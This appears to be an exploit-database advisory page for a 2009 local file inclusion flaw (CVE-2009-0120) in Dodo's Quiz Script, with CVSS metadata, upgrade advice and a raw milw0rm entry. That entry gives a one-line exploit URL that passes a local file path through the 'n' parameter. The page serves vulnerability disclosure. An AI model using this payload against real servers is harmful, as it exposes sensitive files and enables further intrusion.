header-logo
Suggest Exploit
vendor:
Dodo's Quiz Script
by:
Stack-Terrorist
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Dodo's Quiz Script
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: CVE-2009-0120
CPE: o:dodosquiz:dodosquiz:1.0
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=154540https://www.infosecmatter.com/nessus-plugin-library/?id=58325https://www.infosecmatter.com/nessus-plugin-library/?id=108808
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Dodo’s Quiz Script Local File Inclusion Vulnerability

Dodo's Quiz Script is prone to a local file inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to view sensitive files on the affected computer; this may aid in further attacks.

Mitigation:

Upgrade to the latest version of Dodo's Quiz Script.
Source

Exploit-DB raw data:

##############################################
#   Dodo's Quiz Script Local File Inclusion Vulnerability
##############################################
[+] Author : Stack-Terrorist
[+] v4-team.com
==============================================
Script : Dodo's Quiz Script
#################################################
Exploit : http://localsite/path/dodosquiz.php?n=[LocalFile]
#################################################

# milw0rm.com [2009-01-20]

Navigation

Suggest Exploit

Services By CQR